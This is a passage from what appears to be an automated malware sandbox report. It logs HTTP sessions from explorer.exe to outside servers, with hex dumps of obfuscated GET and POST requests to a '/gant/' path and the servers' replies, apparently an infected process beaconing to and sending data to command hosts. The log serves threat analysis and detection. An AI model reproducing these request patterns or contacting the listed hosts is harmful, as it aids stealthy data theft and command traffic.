36 6b 4b 43 32 50 43 36 59 6c 36 45 47 5f 52 4a 7a 55 7a 47 59 4f 47 44 74 63 6f 4b 4e 31 6c 72 56 63 63 6c 45 68 7e 67 4e 45 70 50 59 52 6e 35 55 62 70 4a 70 62 79 7a 6c 6c 6e 50 56 70 50 4b 52 72 69 4a 58 66 50 74 41 5a 43 30 6a 67 73 56 48 77 41 35 4e 76 57 43 64 4e 41 49 30 36 69 68 6d 64 56 62 66 6f 76 30 4b 4f 75 58 54 6e 44 44 34 47 79 71 35 35 4b 36 39 54 59 7a 63 4e 36 50 6a 49 4d 50 55 69 39 70 44 64 70 58 31 63 75 62 58 38 6b 72 6b 43 71 4a 5a 69 55 57 74 73 69 34 66 55 69 4f 76 44 38 56 72 4c 79 54 4a 52 47 6d 4b 35 6d 61 66 49 71 42 5a 5a 51 35 71 61 43 5f 49 6e 4c 39 64 6b 42 34 66 4f 30 75 39 35 7a 77 39 71 39 7a 31 4b 78 63 59 6e 64 74 54 56 37 35 7a 69 7e 6e 67 34 35 69 59 39 53 46 78 45 37 45 75 77 72 4c 4c 45 31 65 52 39 73 4b 6e 51 41 31 77 5f 7a 46 63 76 38 67 49 41 32 59 64 34 42 4a 5a 73 61 39 61 54 4c 4b 50 6d 30 6c 70 74 65 39 79 2d 66 70 58 34 56 37 72 56 74 48 7a 63 76 69 78 6d 47 4b 73 37 65 63 4f 45 48 75 38 6e 41 4f 41 32 59 37 43 61 78 6e 6c 65
                                                                                                                  Data Ascii: j-Jh9P=pb2-HN2Zm0s05DzZelJI1TkAVLWVYCBBqRRqsXY1~H6RcEAcezJUQyXISwuJE4UU1J(yBvztp8(cKOVY4MbMC42tKtjkEgAtyhNJDXcNrYyuRlh2BX2hZrLESmKDeoSdaDSuEtcge2BA7rPzbM7e4XTAzgRRRrXC~BowOsGcYcEA6BY2XVXJaAGplXOHMcbBjFhgdhE2(XFHK08wN1maOvYHbI4A1xip5JO7oz~-EppFHLVSKoyOkIVXcKifhu5nBD1xE0O5ksHfs2qi5dO0sooq1-~UqiJXjTwogmE1LwLshAjyJQOrSo32v93f9H~5HigVpts_8Mdsn6DIebOqhtygADRGofytOkkrzXCYEA0pHz38bMyJKOImI1X7XXOj5n54HwXCkB9IEDGnDNdF8CrdUC8Oh4Dc1eIcphm4f1QIiH7jrfFreleANNzxcEPZwYn6JweHAEIxA_M8gHM3YiBEHMZHwggPiRtK2ZSdLQz5TW4wOdKhiOY4vwETwctta6QogyQw8sajEoWgOq8OFVKyP7zDueMy4snbfwek(saU8pn1i8~UfnYzgvwV(_NqtPXgqrmKLLO0FV9H2lj07gjPPQLc7EoDmKgxMIOV4I5fv-OGNha81s2UqE(whfutH3rcg6tHiybiXu~aw8rspYhLwY0yWJGBe0gPVrOJE-JTCF0Za7gDuHo4fS8n(KDtk6bzqOcM4wrvh2psu9IYGXh-jINORHyUMuUJeqKfz50tXOtiuBxKlLXgJVWpGDKa7XqJXwnbXJh-3XIKc0eV8Lr8QZkhsYvyBZNnYxnijVIzXqLpHh(PFAuLYGShbHvxcgxyJDTpAIRsVv6QMF~ieZsSo99R~gHhgNDQ~hRJy5(3mG16D4JNuwEHI9OMF2psVQr7re9xHxR5TsaMxf5ekEIlfTLP5bF0fBS0Htz9pQBXcGcfoAg8oLmMaUa5KGXDM9rKdLqgsEkMEjz5YB3dC5lQPmr_NcQVB3y1yrreJaW45L1Z3wdLhse3VjzLbkFodL6kKC2PC6Yl6EG_RJzUzGYOGDtcoKN1lrVcclEh~gNEpPYRn5UbpJpbyzllnPVpPKRriJXfPtAZC0jgsVHwA5NvWCdNAI06ihmdVbfov0KOuXTnDD4Gyq55K69TYzcN6PjIMPUi9pDdpX1cubX8krkCqJZiUWtsi4fUiOvD8VrLyTJRGmK5mafIqBZZQ5qaC_InL9dkB4fO0u95zw9q9z1KxcYndtTV75zi~ng45iY9SFxE7EuwrLLE1eR9sKnQA1w_zFcv8gIA2Yd4BJZsa9aTLKPm0lpte9y-fpX4V7rVtHzcvixmGKs7ecOEHu8nAOA2Y7CaxnlerQda44nCpGDAierAKvuvigPd8PxQ0ITuGXTU7FnsxOLMelkzj1pWz7nUpFh_0CCuyNlKiRPi9mDzFzSq8jG5QquexkAahwdHC1UyU3TdmItmTE0zcVQ95hP3CB~io7m2Feu2e9xK(gY3tiHoIOA_EJzM(MuwR0kbyXDhMfAMoPDnIpJ5gCOFi_547kl5WYRVvbXYo-b5xHMgaWrEqHvU(8uuYHRVxlxIjGAbkyn8T9wAmkqFt6(Hh99fuJxGTlgpfSd8shrm3l0uLxbBj5mbzatiAvBnZwF32GKdDqLtodfE9d~lfBpQmd~G3okNdOWFB1rkdOpKvrDw4AWg1MbmPlkP13377m3OpiBx9ajkOGKyeYHHtTJyjMZPWUJz0nRUq4IXkRNoNATafbNDwX21XRAn6LmohFpIvcbm~OOuPohkqlBaWqbvkZKhlp7FdVCOuE6BYarUJHKFaxbmXbHFlH7bJFpAav9WxXOi8cBCufLzVxJZWHAem75PtVVhC5BWGs09KaO6(TWxY1t9tfirJYPO16AoDxoSWeSv4k0bFHpWC-cFXwiKVeboo0AWdemDE-YQEAQjT1B5KtVgsA(TwbglrJI14zO9EGS3o6ddiaitvNVvPJlsd7Een8sxGwBkJ568QyKD9jWVogfhgCpQWMX13J2yH0iF2mORTocRfj(93oBfdffqDxycdoSyMAEzfpDSfrrvNKjFFcpMdxPkL2pZbR1V6mMktOZZDieyOqjuiWi09izJLAMhYFHeFovBV1xk70eGkxdOiJkczKRBeOTE8f8dZVbvY1iFNG
                                                                                                                  Feb 13, 2023 19:05:43.236289024 CET1528OUTData Raw: 39 36 53 42 41 5f 6e 6e 48 42 78 6f 52 71 77 61 4c 77 37 55 77 78 6f 43 7a 30 7e 66 4f 78 35 69 38 6f 78 4c 57 2d 68 58 4f 4a 38 61 57 6b 76 5f 67 43 34 58 32 74 48 6c 57 58 48 6d 5a 6b 4c 6c 77 6a 61 6f 68 42 41 32 70 47 75 49 28 5f 41 4f 77 71
                                                                                                                  Data Ascii: 96SBA_nnHBxoRqwaLw7UwxoCz0~fOx5i8oxLW-hXOJ8aWkv_gC4X2tHlWXHmZkLlwjaohBA2pGuI(_AOwq(f8CVUgFiKRLZwFyan9ETNEEHUXqEVIsrDHAL6BmBdgSAxOMt-umJUhAevXiGWra8KQofS~J2Bi6bMZpsQVZE914a-G6HO1stgN_iv9B114mhCcpAbruc6KTgxSGU9YI08xouv0DAXWb1ic8YM~8x5ffkEkyVHCdR
                                                                                                                  Feb 13, 2023 19:05:43.236377954 CET1534OUTData Raw: 78 6b 71 6b 28 75 55 74 51 6a 6f 37 69 58 68 74 42 64 68 79 76 31 6d 67 28 58 71 42 43 70 7e 64 78 65 63 6f 71 49 75 4b 46 30 39 4b 61 6b 62 69 73 4c 31 66 36 4b 74 5a 75 76 6a 62 49 48 47 4f 42 51 57 79 55 4e 39 55 4f 44 46 6e 53 44 36 4d 62 71
                                                                                                                  Data Ascii: xkqk(uUtQjo7iXhtBdhyv1mg(XqBCp~dxecoqIuKF09KakbisL1f6KtZuvjbIHGOBQWyUN9UODFnSD6MbquhrS2rLt~Sz5y7fIO8ua4CgNHL7BurMRsRcnnfepHdvmXMatN8Ve8VGM2kc9zbTEp-5jzuWawNVZIWyAdLo_q88QxO9a9kBdlyX34htLzPQUP4AYfANt2ew2VvPI2xKA60qb4Se1oZm8ryffsSl9TjdbuAOh~IwsT
                                                                                                                  Feb 13, 2023 19:05:43.396847963 CET1537OUTData Raw: 4c 63 64 39 39 51 4e 70 4c 67 67 74 67 61 6b 47 6c 32 77 4d 72 74 52 4b 36 44 45 79 68 35 42 42 4c 4b 30 68 33 6a 53 71 5a 4e 28 65 73 66 37 64 66 65 45 4e 31 6b 6b 73 51 6f 41 59 6d 6f 34 73 38 36 79 34 6a 52 67 6a 34 6b 34 64 54 2d 43 53 4e 53
                                                                                                                  Data Ascii: Lcd99QNpLggtgakGl2wMrtRK6DEyh5BBLK0h3jSqZN(esf7dfeEN1kksQoAYmo4s86y4jRgj4k4dT-CSNSPnxlu61jnuJmtzuBlmU4YKLLrrzW6JIHWkywSBvaEMuFmQRns6b_PhHl27oLSeQo4Wrn1XCCiYgawG7p0xU7uFvR6mkuTLLM96hI3pGz2AQKLeN_T3vyPDhgBaiBC3fRAhJE~giVUPJv7FEax4btGRXXXZUBq1Dmb
                                                                                                                  Feb 13, 2023 19:05:43.396934032 CET1546OUTData Raw: 6f 39 5a 7a 75 4f 4d 35 31 4b 54 4a 68 37 33 48 6b 5a 51 37 57 5a 77 50 47 4a 4d 48 30 30 43 74 58 50 70 54 54 52 31 5f 37 4b 6e 50 77 45 74 61 6c 55 6f 4e 32 5a 6a 73 62 76 6d 4d 54 57 34 6c 4f 69 42 36 59 6c 48 36 41 6e 72 48 4f 36 6d 73 75 50
                                                                                                                  Data Ascii: o9ZzuOM51KTJh73HkZQ7WZwPGJMH00CtXPpTTR1_7KnPwEtalUoN2ZjsbvmMTW4lOiB6YlH6AnrHO6msuPaj9S2gycFV1MqxDZV7XM2u5JGzQQOQhUFBjBShiAfAgP~ayCj-wsjwI57yzVV7DAGMjyeBszZpGO5SEmmLLLJFhBkmd9TxpHoUH0wAxoJHvOxFiitcvUKmKHCwirpxn5CsHVlLxBXu4ApctnOShFw5CNrgT8Jt9di
                                                                                                                  Feb 13, 2023 19:05:43.397001028 CET1552OUTData Raw: 77 47 68 62 6b 65 6c 45 70 6a 74 66 42 41 4d 37 50 44 63 56 52 6a 4a 46 6e 47 65 6b 31 48 43 57 56 6a 4c 54 31 66 7a 48 57 73 6b 4a 4d 63 68 4c 32 75 62 37 78 69 50 35 6e 62 57 49 30 6b 6f 78 6e 53 53 6e 44 53 41 77 4a 76 76 54 6f 33 74 6a 44 41
                                                                                                                  Data Ascii: wGhbkelEpjtfBAM7PDcVRjJFnGek1HCWVjLT1fzHWskJMchL2ub7xiP5nbWI0koxnSSnDSAwJvvTo3tjDALoo_I0dfnYpEMJNmczriXFYBuDjrRSEqnRLMCzVGjpJhaERuu7G870evJ_UyUzWiDiSW4yjbiCIcarxjFdhkXCkk7Em4o930jiO0TB0qSb2ke2IphKvlhn(rsCo4DBgm0hVpVUW0JwWA25(Am6GNR5NZ2q6snbgig
                                                                                                                  Feb 13, 2023 19:05:43.397211075 CET1560OUTData Raw: 78 6e 33 67 6f 53 71 45 37 35 6f 4e 77 6b 35 51 64 5a 76 56 69 42 7e 4a 48 51 39 54 39 4e 31 56 4d 38 66 72 4c 73 67 68 44 73 6e 2d 50 68 6e 39 4e 45 6b 47 34 58 49 59 48 6b 79 79 59 73 4e 56 4c 6f 4a 57 6d 39 70 57 51 47 42 50 6a 38 66 4d 7e 7a
                                                                                                                  Data Ascii: xn3goSqE75oNwk5QdZvViB~JHQ9T9N1VM8frLsghDsn-Phn9NEkG4XIYHkyyYsNVLoJWm9pWQGBPj8fM~zNKniTPSBglxGXmuL0qxxYTZEJTVU1IxUqi6smfAyvJtj3aRFZjhoosXdR5gQiRrpiHrVSp2NmejDEl1s6UN6Hl57I1JoCZ8k8HQ3qebqns7AncVcBWB-IPCVfw~ubOfrH8neRWXkXTLPexiwM5M3GKcNj0F1CbsTn
                                                                                                                  Feb 13, 2023 19:05:43.557660103 CET1566OUTData Raw: 4e 31 6e 69 39 33 38 53 50 43 4d 4e 73 63 32 45 55 75 68 77 41 64 57 33 78 44 73 35 34 62 6f 6d 46 42 54 46 37 64 4f 69 35 47 63 66 47 57 54 2d 45 6a 44 46 52 43 4c 75 47 49 52 6a 61 55 6c 48 66 37 70 48 48 4a 7e 64 56 72 34 47 42 72 59 4f 59 38
                                                                                                                  Data Ascii: N1ni938SPCMNsc2EUuhwAdW3xDs54bomFBTF7dOi5GcfGWT-EjDFRCLuGIRjaUlHf7pHHJ~dVr4GBrYOY8KP06OKoX9jRa2Tkpo2SI40VWsde_v32eAQlt7uGDhWntCr98cEPorHVmFUirPVrmlyqLiLaLBhiKLeOwTlwiW7EkBQ8cri6znPAS9jtPRAcifHnnmjXXK4V-rO3RG5QXVoHni2Iy8NSf3vN6nxoFkYelg4mahaUW4
                                                                                                                  Feb 13, 2023 19:05:43.557748079 CET1568OUTData Raw: 44 33 45 56 56 31 42 49 39 6d 4e 33 4c 4f 55 2d 30 37 6f 50 61 73 37 6e 4b 57 6b 49 68 6d 4c 67 77 61 50 58 52 63 52 63 6e 32 6d 50 50 53 56 72 5a 68 7a 74 47 55 44 75 73 46 6d 6f 38 6f 28 4d 6c 53 45 4c 53 30 47 4d 47 76 39 49 31 72 74 53 55 73
                                                                                                                  Data Ascii: D3EVV1BI9mN3LOU-07oPas7nKWkIhmLgwaPXRcRcn2mPPSVrZhztGUDusFmo8o(MlSELS0GMGv9I1rtSUsqn8shDRRqlUAWf395jtW~7dHh5zxJrIGB8xD2cfUdUcTI2tfx7xIoI8uZPMkG34w0XdLe4OVvErggImBeg9d386p12b1YCvok8HBRH~Zb-Jy2Hhdyvs5vPe4FBv7XtcGSjVVJaULsVX82s2TmgQbhn8lZdZRlKFAr
                                                                                                                  Feb 13, 2023 19:05:43.558118105 CET1571OUTData Raw: 64 43 67 4f 32 49 62 62 45 34 39 54 4b 59 65 73 57 70 4e 38 39 42 4d 73 34 57 66 61 4d 37 6e 4b 71 6e 58 55 34 59 4a 31 75 78 78 4d 53 4f 52 53 4d 62 61 67 33 67 7a 48 53 76 59 6e 7e 4d 45 6d 5a 6d 6f 54 58 66 58 71 79 41 63 4f 52 5f 65 41 48 43
                                                                                                                  Data Ascii: dCgO2IbbE49TKYesWpN89BMs4WfaM7nKqnXU4YJ1uxxMSORSMbag3gzHSvYn~MEmZmoTXfXqyAcOR_eAHCv0PGHFBeeJ8hb8lSwEBaT6AtVPrcvKQp~O5m336RfHoG13HkeMc9JHhKtv3LCXwklzHCjg0RwjrXqAmD4hXBQpP3gaxRxsSZsXUKx7FM7H0Rb1tQWSI4kwEzmOkqMgaxBPRmORxpa5XIscO4wECsILPXM2qasNlUC
                                                                                                                  Feb 13, 2023 19:05:43.558284998 CET1574OUTData Raw: 49 4a 35 72 46 4e 73 65 66 4d 54 57 65 4b 48 39 57 4a 55 45 42 42 6f 33 37 4d 73 69 63 66 6a 4c 4b 35 45 31 70 34 64 31 6e 6b 65 57 4a 78 52 36 31 37 35 32 35 32 64 6c 6b 67 51 72 76 37 4d 31 57 77 46 57 36 5a 4a 6a 37 74 59 6f 30 39 50 74 54 2d
                                                                                                                  Data Ascii: IJ5rFNsefMTWeKH9WJUEBBo37MsicfjLK5E1p4d1nkeWJxR6175252dlkgQrv7M1WwFW6ZJj7tYo09PtT-iXVy1XDvCq7B7Vd36ikVopBkGqaCnrjzY2dP(gmC(YuhSCpAJTVeeW~qREa8W2te0qxmykJI1Rfco6ufehWITkhSCJFp~Mo9mYzgtjN7F9mJANZPjkHBauOqEhuQE-YAqXAxEKT1321yMHv7cEVs1Bvv5QLOvrEAB
                                                                                                                  Feb 13, 2023 19:05:43.722431898 CET1575INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:43 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  67192.168.11.2049924162.241.225.6980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:45.925051928 CET1576OUTGET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.flyshareinc.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:05:46.096812010 CET1576INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:46 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  68192.168.11.2049926142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:51.201373100 CET1584OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 75 39 6c 4c 54 64 55 63 50 47 52 4a 48 71 50 73 36 2d 33 51 52 52 38 48 50 62 75 42 34 74 42 74 6a 6d 37 69 4e 36 73 58 6c 43 36 56 57 41 71 30 53 56 44 33 53 6d 4f 61 73 79 67 69 56 7a 7a 74 46 7a 66 6f 49 74 51 6b 72 76 58 34 52 4c 79 36 6f 59 62 75 53 5f 34 44 46 66 47 66 38 7a 35 50 4b 72 72 57 41 4c 65 70 53 4a 42 4c 31 73 67 30 53 75 37 50 5a 58 46 32 49 76 28 77 4d 6c 4b 59 57 75 34 56 57 72 4d 70 62 79 28 52 48 72 6c 79 5a 62 28 5a 28 77 61 36 46 41 62 45 74 6b 45 4b 4d 78 62 67 74 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-u9lLTdUcPGRJHqPs6-3QRR8HPbuB4tBtjm7iN6sXlC6VWAq0SVD3SmOasygiVzztFzfoItQkrvX4RLy6oYbuS_4DFfGf8z5PKrrWALepSJBL1sg0Su7PZXF2Iv(wMlKYWu4VWrMpby(RHrlyZb(Z(wa6FAbEtkEKMxbgtg).
                                                                                                                  Feb 13, 2023 19:05:51.697899103 CET1585INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:05:51 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  69192.168.11.2049927142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:53.825829029 CET1587OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 76 64 56 4c 55 2d 38 63 65 57 52 4b 4c 4b 50 73 68 75 33 55 52 52 67 48 50 61 71 72 34 37 35 74 36 45 6a 69 44 66 41 58 69 43 36 56 59 67 71 74 66 31 43 35 53 6d 43 34 73 7a 4d 69 56 7a 6e 74 48 47 44 6f 41 39 51 72 7a 66 58 37 53 4c 79 33 73 59 62 53 53 5f 45 31 46 65 43 66 38 48 4a 50 59 61 48 57 45 61 65 71 5a 4a 42 4e 6b 63 67 37 63 2d 37 5f 5a 58 41 44 49 75 47 4e 4e 54 69 59 57 4e 41 56 56 72 4d 6d 4f 79 28 63 50 4c 6b 65 5a 75 65 38 35 57 61 48 59 56 62 38 32 58 78 71 4e 43 4f 75 33 39 61 34 55 6d 77 70 41 6f 64 47 52 77 37 6c 42 44 74 33 53 54 46 78 37 30 52 55 58 4e 74 46 74 73 39 46 58 37 46 52 6a 31 78 70 70 56 70 6f 4b 6f 4a 75 53 38 7a 4e 6e 49 7a 46 7a 59 47 47 64 30 35 6b 67 49 77 79 68 67 50 65 57 57 4c 52 48 48 58 59 56 4b 4a 6c 70 41 79 66 4d 79 41 58 39 31 73 68 58 4d 4d 38 43 79 30 39 69 51 5a 64 74 63 4f 77 70 49 6a 32 33 62 44 34 65 4b 31 37 61 42 7e 32 42 34 7a 64 77 79 28 56 61 75 50 34 43 78 64 54 39 7a 54 53 6c 49 4b 69 51 41 67 6f 6c 4b 56 69 49 4d 7e 31 52 43 43 6e 45 6f 79 43 46 62 7e 5f 55 51 35 32 78 53 52 43 6c 67 78 78 7e 36 41 56 46 49 6f 65 6b 7a 37 57 46 78 61 4d 4e 32 62 78 70 38 67 4d 4b 71 51 4a 76 41 51 65 4e 36 41 76 59 41 57 74 53 51 4b 5a 70 2d 57 4c 4c 36 7a 43 44 76 33 